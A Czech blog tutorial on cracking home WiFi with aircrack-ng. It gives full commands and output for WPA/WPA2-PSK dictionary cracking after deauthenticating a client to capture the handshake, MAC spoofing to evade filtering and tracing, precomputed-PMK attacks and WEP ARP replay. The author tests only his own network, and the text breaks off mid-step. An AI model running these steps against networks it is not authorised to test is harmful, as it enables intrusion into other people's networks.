Portál AbcLinuxu, 2. května 2024 23:09

Hacking WiFi

9.6.2012 18:39 | Přečteno: 29256× | Výběrový blog

Konečně jsem našel trochu času a síly k dalšímu příspěvku. Tentokrát budu psát o něčem, co pro mě bylo vždy obestřeno tajemstvím a co mě zároveň přitahovalo: Hackování. V tomto zápisku se budu věnovat konkrétně hackování Wi-Fi sítí. V rámci možností se budu snažit vysvětlit jednotlivé kroky a postupy tak, aby čtenář pochopil jak to vlastně funguje a v případě laborování na základě informací obsažených v tomto zápisku měl představu o tom co dělá. Zkrátka, aby to nebylo jen tupé opisování příkazů. Předem se omlouvám za nepřesnosti a případné chyby - budu jen rád za konstruktivní kritiku. Jen dodám, že jsem hackoval vlastní síť.

ÚVOD

Zaměřil jsem se na sítě, se zabezpečením WPA/WPA2 s PSK autentizací a WEP s OPN autentizací a to proto, že jsou dnes zastoupeny nejvíce. Dále předpokládám, že čtenář má řekněme nějakou základní znalost IT a ví, co je např. MAC adresa nebo IP adresa. Hned tady na začátku uvedu, že hackování Wi-Fi sítí opravdu není tak jednoduché, jak to znáte z youtube, kde nějaký borec prostě napíše deset příkazů a je tam:) Vše je něčím PODMÍNĚNO!

Ještě než se pustím do samotného popisu hacku Wi-Fi sítě, uvedu vybavení jež jsem použil pro hackování.


AP: Mikrotik RB751G-2HnD
MAC adresa: xx:xx:xx:xx:xx:F9


PC1: Lenovo NB (hackovací PC)
Wi-Fi síťová karta: Intel Corporation PRO/Wireless 5100 AGN
CPU: Intel Core2Duo P8400 2,26GHz
RAM: 4GB
HDD: 500GB
OS: Backtrack 5 R2
Ovladač Wi-Fi síťové karty: iwlwifi (alias iwlagn)
Programy: airmon-ng, airodump-ng, aireplay-ng, airolib-ng, aircrack-ng


PC2: Toshiba NB
Wi-Fi síťová karta: TP-LINK TL-WN510G
CPU: Intel Celeron 2,6GHz
RAM: 256MB
HDD: 6GB
OS: MS Windows XP SP3
Ovladač Wi-Fi síťové karty: TP-LINK 11b/g Wireless Adapter (ar5211.sys)
MAC adresa: xx:xx:xx:xx:xx:D0


Zaměřil jsem se na sítě, se zabezpečením WPA/WPA2 s PSK autentizací a WEP s OPN autentizací a to proto, že jsou dnes zastoupeny nejvíce. Dále předpokládám, že čtenář má řekněme nějakou základní znalost IT a ví, co je např. MAC adresa nebo IP adresa. Hned tady na začátku uvedu, že hackování Wi-Fi sítí opravdu není tak jednoduché, jak to znáte z youtube, kde nějaký borec prostě napíše deset příkazů a je tam:) Vše je něčím PODMÍNĚNO!


TEORIE OBECNĚ

Teorie autentizace a asociace


Wi-fi sítě zmíněné v tomto zápisku jsou standardu 802.11. Pokud se chce klient připojit musí se nejprve autentizovat a následně k danému AP asociovat. K tomu jsou využívány tzv. management rámce (uvedené níže).

Management rámce


Obrázek ilustrující autentizaci a asociaci:

Popis použitých nástrojů

Použité zkratky

Typy zabezpečení wifi sítí


WPA/WPA2

WPA/WPA2 TEORIE

Teorie útoku na sítě se zabezpečením WPA/WPA2 a PSK autentizací

U hackování WPA/WPA2 s PSK autentizací jsem se zaměřil na útok pomocí slovníkové metody, což znamená, že pokud heslo není v použitém slovníku tak se do sítě prostě nedostaneme. Pokud má slovník třeba i několik gigabajtů, tak můžeme strávit týdny lámáním hesla a to i na výkonném PC a pokud heslo ve slovníku nebude, tak se nikam nedostaneme a budeme akorát naštvaní, že jsme promarnili čas. Proto abysme byli úspěšní, tak heslo musí být obsaženo ve slovníku. Další možnost by bylo použití brute-force útoku - pro ten však nemáme dostatečně výkonný počítač. Tak, pokud jsem vás ještě neodradil a jste rozhodnuti to přece jen zkusit, čtěte dál - budu se snažit vás nezklamat:)

Použijeme jednu techniku s tím, že heslo crackneme jednou přímo ze slovníku ( bez převypočtené hash tabulky), a podruhé s předvypočtenou hash tabulkou.

Nejprve se pokusím zjednodušeně vysvětlit rozdíl mezi útokem bez převypočtené hash tabulky (dále jen útok A) a útokem s pomocí hash tabulky (dále jen útok B), alespoň tak jak jsem ho pochopil. Základem obou typů útoku je získat handshake, protože v něm je uložen mimo jiné "hash(passphrase + essid)".

U útoku A v posledním kroku pomocí programu aircrack uděláme "hash(passphrase_ze_slovniku + essid)" a porovnáme se zachycenými daty z handshaku. Postup se tedy skládá ze dvou kroků. Udělat "hash(passphrase_ze_slovniku + essid)" a porovnat s handshake. Tyto dva kroky opakujeme tak dlouho až je nalezena shoda (opět připomínán, heslo musí být ve slovníku). Výhoda této metody je, že je "zanedbatelně" jednodušší než metoda použitá u útoku B. Nevýhoda plyne už ze samotného principu útoku B(viz. níže).

U útoku B si krok, ve kterém provádíme "hash(passphrase_ze_slovniku + essid)" uděláme předem a uložíme do databáze. Nakonec pomocí programu aircrack-ng jen porovnáváme položky z databáze a handshakem. Samotné porovnávání je nesrovnatelně rychlejší než provedení "hash(passphrase_ze_slovniku + essid)", řádově několik tisíckrát. Někdo může namítnout, že operace "hash(passphrase_ze_slovniku + essid)" musíme stejně udělat před samotným porovnáním a tím pádem bude doba strávená výpočty stejně dlouhá jako u útoku A. Ano, to je pravda. Ale zkusme se podívat na následující příklad jež vypovídají o výhodách útoku B.


Příklad)

Mějme síť s ESSID "mikrotik" a passphrase "hesloheslo" a předpokládejme, že passphrase máme v použitém slovníku.


Útok A)
Bude se skládat z cyklického provádění kroků:
  1. "hash(passphrase_ze_slovniku + essid)"
  2. porovnání výsledku "hash(passphrase_ze_slovniku + essid)" se zachyceným handshake
A to tak dlouho dokud nezískáme správnou hodnotu "hash(passphrase_ze_slovniku + essid)", která se bude rovnat té ze zachyceneného handshake. Když se admin sítě s ESSID "mikrotik" rozhodne změnit passphrase(pro zjednodušení uvažujme, že passphrase bude v našem slovníku blízko pozice předešlé passphrase) pak nám nezbude než znova cyklicky provádět kroky:
  1. "hash(passphrase_z_slovniku + essid)"
  2. porovnání výsledku "hash(passphrase_ze_slovniku + essid)" s zachyceným handshake.
Takže útok bude trvat zhruba stejně dloho jako předchozí (nová passphrase je ve slovníku blízko předchozí).

Útok B)
Bude se skládat z cyklického provádění kroku "hash(passphrase_z_slovniku + essid)" jehož výsledek uloží do databáze nazvané třeba "hashdb". Až bude DB "hashdb" hotová budou se jednotlivé položky DB "hashdb" porovnávat se zachyceným handshake. Máme tu tedy kroky:
  1. "hash(passphrase_z_slovniku + essid)"
  2. porovnání výsledku "hash(passphrase_z_slovniku + essid)"se zachyceným hanshake
Stejně jako u útoku A. Doba na získání passphrase je tedy stejná. Kde je tedy ta výhoda útoku B? Admin sítě s ESSID "mikrotik" se rozhodne opět změnit passphrase. A tady se dostáváme k výhodě útoku B. Krok "hash(passphrase_z_slovniku + essid)" už nemusíme provádět - máme ho totiž uložený v DB "hashdb". V tomto případě budeme jen porovnávat se zachyceným handshake a tím pádem jsme schopni získat passphrase až několik tisíckrát rychleji. Další výhoda útoku B je v tom, že pokud někde narazíme na síť se stejným ESSID jaké máme předvypočítané v DB "hashdb", opět už provádíme jen operaci porovnávání.

WPA/WPA2 PRAXE

Dále budou uvedeny kroky k prolomení hesla do Wi-Fi sítě se zabezpečením WPA/WPA2, autentizací pomocí PSK a s použitím slovníkového útoku. Znovu opakuji: pokud není heslo v použitém slovníku, nebudeme schopni jej získat.

U každého kroku je vždy popsáno co děláme, příslušný příkaz a jeho výstup.


Útok na síť se zabezpečením WPA/WPA2 a PSK autentizací - Útok A

1) Přepneme síťovou kartu do "monitor módu". Od této chvíle budeme pracovat s rozhraním mon0.
root@bt:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
1301	dhclient3
1817	dhclient3
Process with PID 1817 (dhclient3) is running on interface wlan0


Interface	Chipset		Driver

wlan0		Intel 5100	iwlagn - [phy0]
				(monitor mode enabled on mon0)
root@bt:~# airmon-ng
Interface       Chipset         Driver

wlan0           Intel 5100      iwlagn - [phy0]
mon0            Intel 5100      iwlagn - [phy0]
2) Změníme MAC adresu rozhraní mon0. Ztížíme pak naše případné vystopování. Některé sítě mají nastavený MAC filtering, takže si můžeme nastavit adresu stejnou jakou má legitimní klient v síti. Pokud budou mít dvě stanice stejnou MAC, tak se nedá říct jak na to router (AP) zareaguje - záleží na výrobci.
root@bt:~# ip link set mon0 down
root@bt:~# ip link set mon0 address 00:11:22:33:44:55
root@bt:~# ip link set mon0 up
3) Zapneme skenování sítí a uděláme si tak přehled o tom, které sítě jsou dostupné a zároveň získáme potřebné údaje pro útok. Ze zobrazených sítí jsem si vybral síť s ESSID "Mikrotik" (je to moje síť). Nebudu zde rozepisovat co znamená která položka z následujícího výpisu, to je pěkně popsáno na webu aircracku.
root@bt:~# airodump-ng mon0

CH 12 ][ Elapsed: 8 s ][ 2012-04-07 13:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 xx:xx:xx:xx:xx:F9  -15     1240     1120    0   1  54e. WPA2 CCMP   PSK  mikrotik
 xx:xx:xx:xx:xx:xx  -56       18        2    0   5  54   WPA2 CCMP   PSK  xxxx
 xx:xx:xx:xx:xx:xx  -56       27        0    0   5  54   WEP  WEP         xxxx

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  -58    0 - 1     31       12  xxxx
 xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -15   54e-54     57       14  mikrotik 
4) V tomto kroku zachytíme 4way-handshake z něhož nakonec získáme passphrase nutnou pro přihlášení k AP. Z výpisu z předešlého kroku vidíme, že síť "Mikrotik" je na 1. kanálu a AP má BSSID xx:xx:xx:xx:xx:F9. Zachycený 4way-handshake uložíme do souboru mikrotik. Handshake můžeme získat 2 způsoby. První je, že budeme čekat, až se některá stanice přihlásí k AP, ale to bysme taky mohli čekat věčnost... Druhý je založen na tom, že budeme aktivní a nějakou stanici deautentizujeme pomocí programu aireplay-ng v kroku 5.
root@bt:~#  airodump-ng -c 1 -w mikrotik --bssid xx:xx:xx:xx:xx:F9 mon0

CH  1 ][ Elapsed: 24 s ][ 2012-05-20 12:53 ]                                        
                                                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
                                                                                                                                                           
 xx:xx:xx:xx:xx:F9   -7   0      233      278    0   1  54e. WPA2 CCMP   PSK  mikrotik 
                                                                             
                                                                              
 BSSID              STATION            PWR   Rate    Lost  Packets Probes 
                                                                                                                                                           
 xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -30    5e-54     12      380  mikrotik
Po tom co v kroku 5) proběhne deautentizace můžeme v pravém horním rohu vidět "WPA handshake: xx:xx:xx:xx:xx:F9". V tu chvíli máme handshake odchycený a zachytávání můžeme zastavit viz. níže. Než se v pravém horním rohu WPA handshake objeví tak to může chvíli trvat - musíme zkrátka počkat až se stanice znova autentizuje. Následující výpis se tedy zobrazí až po tom co vykonáme krok 5).
CH  1 ][ Elapsed: 24 s ][ 2012-05-20 12:53 ][ WPA handshake: xx:xx:xx:xx:xx:F9                                         
                                                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
                                                                                                                                                           
 xx:xx:xx:xx:xx:F9   -7   0      233      278    0   1  54e. WPA2 CCMP   PSK  mikrotik 
                                                                                                                                              
 BSSID              STATION            PWR   Rate    Lost  Packets   Probes 
                                                                                                                                                           
 xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -30    5e-54     12      380  mikrotik
5) V tomto kroku deautentizujeme stanici s MAC adresou xx:xx:xx:xx:xx:D0. Tím ji donutíme se znova autentizovat. Díky tomu proběhne mezi stanicí a AP 4way-handshake, který zachytíme. Parametr -e udává ESSID sítě a parametr -0 určuje, že stanice bude deautentizována. Pokud se nám v kroku 4 nezobrazí žádná "STATION" použijeme příkaz bez přepínače -c. Tedy jen: "aireplay-ng -0 1 -e Mikrotik mon0".
root@bt:~# aireplay-ng -0 1 -e mikrotik -c xx:xx:xx:xx:xx:D0 mon0

12:53:26  Waiting for beacon frame (ESSID: mikrotik) on channel 1
Found BSSID "xx:xx:xx:xx:xx:F9" to given ESSID "mikrotik".
12:53:27  Sending 64 directed DeAuth. STMAC: [xx:xx:xx:xx:xx:D0] [ 4|66 ACKs]
6) Nyní máme vše co potřebujeme pro pokus o prolomení hesla. Čili, soubor se zachceným handshakem a slovník, který si stáhneme z netu (stačí trochu zagooglit). Na prolomení hesla použijeme program aircrack-ng, jemuž jako parametr předáme soubor se zachyceným handshakem a slovník. Ve výpisu pak vidíme kolik hesel bylo otestováno, jakou rychlostí a nakonec i samotné heslo: "KEY FOUND! [ hesloheslo ]". K rychlosti testování klíčů bych ještě dodal, že jsem zkoušel cracknout heslo na na stroji s dvěma jádry v CPU a rychlost crackování byla přímo úměrná počtu použitých jader.
root@bt:~# aircrack-ng -w slovnik.txt cap_file_mikrotik-01.cap

Opening mikrotik-01.cap
Read 1050 packets.

   #  BSSID              ESSID                     Encryption

   1  xx:xx:xx:xx:xx:F9  mikrotik                  WPA (1 handshake)

Choosing first network as target.

Opening cap_file_mikrotik-01.cap
Reading packets, please wait...


 Aircrack-ng 1.1 r1899


                   [00:00:15] 18980 keys tested (1252.39 k/s)


                          KEY FOUND! [ hesloheslo ]


      Master Key     : 16 8F 40 94 70 27 EF 56 24 55 B5 2A D6 9F 9E B5 
                       88 D4 35 67 02 12 53 06 0B EB EF F1 EB CB C2 9A 

      Transient Key  : 2F 36 34 3D 21 E2 46 A1 B6 61 C8 02 EA 17 12 35 
                       B1 F4 81 C1 AE B8 EA 85 7F EB 3C 4B 0E E8 B9 42 
                       62 A1 33 5F 6F FD A3 EC 86 17 1A 4F FB 44 AA 73 
                       2C 57 4B 22 EF B3 B6 B1 C5 15 D6 21 6B FE 47 AC 

      EAPOL HMAC     : 13 9A 2F AD 41 62 DC 1A AE 84 8E 00 9C 60 B5 9C 
7) Poslední krok je připojení se do samotné sítě. Budeme předpokládat, že v síti je DHCP server jež nám přidělí IP adresu. V tomto podkroku se nejprve do sítě autentizujeme/asociujeme. Pro autentizaci a asociaci použijeme příkazy wpa_passphrase a wpa_supplicant. Wpa_passphrase předáme dva parametry: essid a passphrase. Výstup přesměrujeme do souboru. Tím se nám vytvoří konfigurační soubor pro program wpa_supplicant. Pomocí programu wpa_supplicant se do sítě autentizujeme/asociujeme. Jako parametry předáváme kernel driver, ketrý je potřeba pro asociaci s AP, použitý interface a konfigurační soubor.
root@bt:~# wpa_passphrase mikrotik "hesloheslo" > /etc/wpa_supplicant/wpa-psk.conf
root@bt:~# wpa_supplicant -D wext -i wlan0 -c /etc/wpa_supplicant/wpa-psk.conf

wpa_supplicant -D wext -i wlan0 -c /etc/wpa_supplicant/wpa-psk.conf ()
WPS-AP-AVAILABLE 
Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
Authentication with xx:xx:xx:xx:xx:f9 timed out.
WPS-AP-AVAILABLE 
Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
Associated with xx:xx:xx:xx:xx:f9
WPA: Key negotiation completed with xx:xx:xx:xx:xx:f9 [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to xx:xx:xx:xx:xx:f9 completed (auth) [id=0 id_str=]


cat /etc/wpa_supplicant/wpa-psk.conf

network={
	ssid="mikrotik"
	#psk="hesloheslo"
	psk=168f40947027ef562455b52ad69f9eb588d43567021253060bebeff1ebcbc29a
}

iwconfig wlan0

wlan0     IEEE 802.11abgn  ESSID:"mikrotik"  
          Mode:Managed  Frequency:2.412 GHz  Access Point: xx:xx:xx:xx:xx:F9   
          Bit Rate=1 Mb/s   Tx-Power=15 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=70/70  Signal level=-19 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:20   Missed beacon:0
Nyní jsme asociovaní se sítí, takže nám zbývá nakonfigurovat síťové rozhraní, což provedeme pomocí DHCP serveru a klienta. Konkrétně použijeme program dhclient. Jako parametr mu předáváme síťové rozhraní jež chceme použít.
root@bt:~# dhclient wlan0

Internet Systems Consortium DHCP Client V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

mon0: unknown hardware address type 803
mon0: unknown hardware address type 803
Listening on LPF/wlan0/00:11:22:33:44:55
Sending on   LPF/wlan0/00:11:22:33:44:55
Sending on   Socket/fallback
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 8
DHCPOFFER of 192.168.88.251 from 192.168.1.2
DHCPREQUEST of 192.168.88.251 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.88.251 from 192.168.1.2
bound to 192.168.88.251 -- renewal in 126626 seconds.
Pokud jsme byli ve všech výše zmíněných krocích úspěsní, můžeme začít síť používat. Pokud byl na routeru zapnutý MAC filtering tak nebylo možné se do sítě dostat. Výstup pokusu o připojení viz. níže.
wpa_supplicant -D wext -i wlan0 -c /etc/wpa_supplicant/wpa-psk.conf

WPS-AP-AVAILABLE 
Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
Authentication with xx:xx:xx:xx:xx:f9 timed out.
WPS-AP-AVAILABLE 
Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
Authentication with xx:xx:xx:xx:xx:f9 timed out.
WPS-AP-AVAILABLE 
Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
Authentication with xx:xx:xx:xx:xx:f9 timed out.
WPS-AP-AVAILABLE 
Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
Authentication with xx:xx:xx:xx:xx:f9 timed out.

root@bt:~# iwconfig wlan0

wlan0     IEEE 802.11abgn  ESSID:"mikrotik"  
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated   
          Tx-Power=15 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
V případě, že jsem nechal MAC filtering zapnutý a nastavil jsem na PC1 MAC adresu PC2 (v síti tedy budou připojeny 2 PC se stejnou MAC) nebylo možné se s PC1 do sítě připojit (viz. níže) a to i v případě, že mělo silnější signál.
root@bt:~# ip link set wlan0 down
root@bt:~# ip link set wlan0 address xx:xx:xx:xx:xx:D0
root@bt:~# ip link set wlan0 up


root@bt:~# wpa_supplicant -D wext -i wlan0 -c /etc/wpa_supplicant/wpa-psk.conf

ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
WPS-AP-AVAILABLE 
Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
Associated with xx:xx:xx:xx:xx:f9
WPA: Key negotiation completed with xx:xx:xx:xx:xx:f9 [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to xx:xx:xx:xx:xx:f9 completed (auth) [id=0 id_str=]
WPA: EAPOL-Key Replay Counter did not increase - dropping packet
WPA: EAPOL-Key Replay Counter did not increase - dropping packet
WPA: EAPOL-Key Replay Counter did not increase - dropping packet


root@bt:~# iwconfig wlan0

wlan0     IEEE 802.11abgn  ESSID:"mikrotik"  
          Mode:Managed  Frequency:2.412 GHz  Access Point: xx:xx:xx:xx:xx:f9   
          Bit Rate=13.5 Mb/s   Tx-Power=15 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=70/70  Signal level=-22 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:16   Missed beacon:0


root@bt:~# dhclient wlan0

Internet Systems Consortium DHCP Client V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

Listening on LPF/wlan0/xx:xx:xx:xx:xx:D0
Sending on   LPF/wlan0/xx:xx:xx:xx:xx:D0
Sending on   Socket/fallback
DHCPREQUEST of 192.168.88.251 on wlan0 to 255.255.255.255 port 67
DHCPREQUEST of 192.168.88.251 on wlan0 to 255.255.255.255 port 67
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 6
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 13
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 16
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 11
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 15
No DHCPOFFERS received.
Trying recorded lease 192.168.88.251
bound: renewal in 126966 seconds.
V případě, že jsem PC2 odpojil tak se s PC1(má MAC adresu PC2) bez problémů připojím.
root@bt:~# wpa_supplicant -D wext -i wlan0 -c /etc/wpa_supplicant/wpa-psk.conf

Trying to associate with xx:xx:xx:xx:xx:f9 (SSID='mikrotik' freq=2412 MHz)
WPS-AP-AVAILABLE 
Associated with xx:xx:xx:xx:xx:f9
WPA: Key negotiation completed with xx:xx:xx:xx:xx:f9 [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to xx:xx:xx:xx:xx:f9 completed (auth) [id=0 id_str=]


root@bt:~# dhclient wlan0

There is already a pid file /var/run/dhclient.pid with pid 2055
killed old client process, removed PID file
Internet Systems Consortium DHCP Client V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

mon0: unknown hardware address type 803
mon0: unknown hardware address type 803
Listening on LPF/wlan0/xx:xx:xx:xx:xx:D0
Sending on   LPF/wlan0/xx:xx:xx:xx:xx:D0
Sending on   Socket/fallback
DHCPREQUEST of 192.168.88.251 on wlan0 to 255.255.255.255 port 67
DHCPNAK from 192.168.1.2
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 8
DHCPOFFER of 192.168.88.252 from 192.168.1.2
DHCPREQUEST of 192.168.88.252 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.88.252 from 192.168.1.2
bound to 192.168.88.252 -- renewal in 100518 seconds.

Útok na síť se zabezpečením WPA/WPA2 a PSK autentizací a s použitím předvypočtené hash tabulky - Útok B

Kroky 1-5 jsou stejné jako u útoku A.

6) Jak už bylo popsáno v teoretické části, u tohoto typu útoku vytvoříme DB s "hash(passphrase_ze_slovniku + essid)". DB vytvoříme pomocí programu airolib-ng jemuž předáme jako parametr cestu k slovníku s hesly (password_file.txt), cestu k souboru se jmény sítí (essid.txt) a jméno DB (crackwpa). Tady ještě dodám, že sítí může být více. V DB pak bude množina kombinací "každá síť s každou passphrase_z_slovniku". Ve výpisu příkazu je řádek "Writing...s read, 734 invalid lines ignored.". Program airoloib-ng vynechává hesla, která není možné u WPA/WPA2 použít (možné je použít jen 8-63 znaků).
root@bt:~# airolib-ng crackwpa --import passwd password_file.txt

Database (crackwpa) does not already exist, creating it...
Database (crackwpa) successfully created
Reading file...
Writing...s read, 734 invalid lines ignored.
Done.

root@bt:~/airolib# airolib-ng crackwpa --import essid essid.txt

Reading file...
Writing...
Done.
7) V tomto kroku je DB "čištěna" od neplatných ESSID, je prováděn test integrity DB, redukuje se velikost DB atd. Výstup programu vypovídá o právě prováděných akcích.
root@bt:~/airolib# airolib-ng crackwpa --clean all

Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
integrity_check
ok
Done.
8) Dále si můžeme vypsat statistiky naší DB.
root@bt:~/airolib# airolib-ng crackwpa --stats

There are 1 ESSIDs and 78398 passwords in the database. 0 out of 78398 possible combinations have been computed (0%).

ESSID	Priority	Done
Mikrotik	64	0.0
9) V tomto kroku jsou vytvořeny kombinace ESSID s hesly obsaženými ve našem slovníku "hash(passphrase_ze_slovniku + essid)". Tento krok trvá nejdéle.
root@bt:~/airolib# airolib-ng crackwpa --batch

Computed 78398 PMK in 393 seconds (199 PMK/s, 0 in buffer). All ESSID processed.
10) V tomto kroku se ověřuje množina výsledných klíčů s tím, že nevalidní jsou z DB smazány.
root@bt:~/airolib# airolib-ng crackwpa --verify all

Checking all PMKs. This could take a while...
ESSID	PASSWORD	PMK_DB	CORRECT
11) Následuje poslední krok útoku B. Programu aircrack-ng je předána námi vytvořená DB (crackwpa) a soubor se zahcyceným handshakem. Všiměte si rychlosti testování jednotlivých klíčů a porovnejte s předchozím typem útoku.
root@bt:~/airolib# aircrack-ng -r crackwpa mikrotik-01.cap

Opening mikrotik-01.cap
Read 1863 packets.

   #  BSSID              ESSID                     Encryption

   1  00:02:72:5D:70:35  Mikrotik                      WPA (1 handshake)

Choosing first network as target.

Opening mikrotik-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r1899


                   [00:00:00] 7822 keys tested (65705.14 k/s)


                          KEY FOUND! [ hesloheslo ]


      Master Key     : 30 FE 92 BA 01 5F 50 16 3C 3B 76 95 AC 57 BE 49 
                       76 A7 E4 E7 F1 36 CD 39 AF 86 CD 1D 02 E7 DB 65 

      Transient Key  : 98 0F C0 C4 B7 C5 AE 5D 01 AA 1A 30 BA A5 11 02 
                       E5 BA A1 97 04 A5 07 3F D5 6F D3 F3 88 F6 10 CF 
                       E0 3A B2 EF A5 CF ED CD 00 5D 9B 8A 56 30 F2 49 
                       39 4C 80 80 81 7B 2F AD CB B9 06 9D D5 E8 0E 9B 

      EAPOL HMAC     : 67 7A FD EE FC CE 19 20 39 0E C3 8B 29 25 82 45 


Quitting aircrack-ng...

WEP

WEP TEORIE

Teorie útoku na síť se zabezpečením WEP a OPN autentizací


U hackování WEP s OPN autentizací použijeme metodu Arp replay, jež umožní získání dostatečného množství inicializačních vektorů (dále jen IV) k prolomení hesla. Metoda je založena na generování ARP packetů a jejich zasílání na AP (což je nejvíce efektivní způsob jak donutit AP generovat nové IV). Ten nám bude odpovídat novými ARP packety s novými IV. Díky zachycení dostatečného množství IV jsme schopni získat heslo pro přístup do sítě.

WEP PRAXE

Útok na síť se zabezpečením WEP


Kroky 1) a 2) jsou identické jako u metody pro crack WPA. Tedy přepnutí karty do "monitor módu" a změna MAC adresy.

3) Zapneme skenování sítí a uděláme si tak přehled o tom, které sítě jsou dostupné a zároveň získáme potřebné údaje pro útok. Z zobrazených sítí jsem si vybral mou síť s ESSID "Mikrotik". Při skenování můžeme použít přepínač -t s parametrem WEP, díky tomu se nám zobrazí jen sítě s WEP zabezpečením. Problémy s MAC filteringem jsem nastínil v kapitole o crackování WPA, dále tedy MAC filtering nebudu uvažovat. Nebudu zde rozepisovat co znamená která položka z následujícího výpisu, to je pěkně popsáno na webu aircracku.
root@bt:~# airodump-ng mon0 -t WEP

CH  6 ][ Elapsed: 1 min ][ 2012-06-03 11:33                                         
                                                                                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID   
                                                                                                                                                            
 xx:xx:xx:xx:xx:F9  -15      288        0    0   1  54e. WEP  WEP  	mikrotik	       
 xx:xx:xx:xx:xx:xx  -59      277        0    0   5  54   WEP  WEP       xxxxxxxxxx  
                                                                            
                                                                                                                                                             
 BSSID              STATION            PWR   Rate    Lost  Packets Probes 
                                                                                                                                                             
            
 xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -16    9e- 1      0       31 mikrotik 
 xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  -78   54 - 1      0      145 xx:xx:xx:xx:xx:xx 
4) V tomto kroku zachytíme potřebná data, z nichž nakonec získáme IV nutné pro získání hesla. Z výpisu z předešlého kroku můžeme vidět, že síť "Mikrotik" je na 1. kanálu a AP má BSSID xx:xx:xx:xx:xx:F9. Zachycená data uložíme do souboru mikrotik.cap. Pro to abychom byli schopni získat heslo je třeba zachytit dostatečné množství dat (viz. položka #Data). Nelze říci kolik přesně - různé zdroje uvádí různé údaje(obecně, čím více tím lépe). V mém případě stačilo kolem 10000. Pokud však na síti není žádný provoz, tak nemáme možnost je zachytit. Jediná možnost je vytvořit provoz uměle, viz. další kroky.
root@bt:~# airodump-ng -c 1 -w mikrotik.cap --bssid xx:xx:xx:xx:xx:F9 mon0

CH  1 ][ Elapsed: 16 s ][ 2012-06-03 11:44                                         
                                                                                                                                                            
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
                                                                                                                                                            
 xx:xx:xx:xx:xx:F9   -5 100      161        7    0   1  54e. WEP  WEP         mikrotik    
                                                                                                                                                            
 BSSID              STATION            PWR   Rate    Lost  	Packets  Probes 
                                                                                                                                                            
 xx:xx:xx:xx:xx:F9  xx:xx:xx:xx:xx:D0  -15    0 -54e     0        6    	 mikrotik
5) V tomto kroku provedeme falešnou autentizaci a následně asociaci. Díky tomu budeme moci v následujících krocích vytvořit datový provoz, který zachytíme a získáme z něj potřebné heslo. Z výpisu vidíme, že autentizace a asociace proběhla úspěšně.
root@bt:~# aireplay-ng -1 0 -a xx:xx:xx:xx:xx:F9 mon0

No source MAC (-h) specified. Using the device MAC (00:11:22:33:44:55)
11:47:19  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:F9) on channel 1

11:47:19  Sending Authentication Request (Open System) [ACK]
11:47:19  Authentication successful
11:47:19  Sending Association Request [ACK]
11:47:19  Association successful :-) (AID: 1)
6) V tomto kroku útokem arp replay generujeme velké množství paketů - vzniká tak datový provoz (viz. výstup příkazu). Přepínačem -3 volíme právě arp replay attack.
root@bt:~# aireplay-ng -3 -b xx:xx:xx:xx:xx:F9 mon0

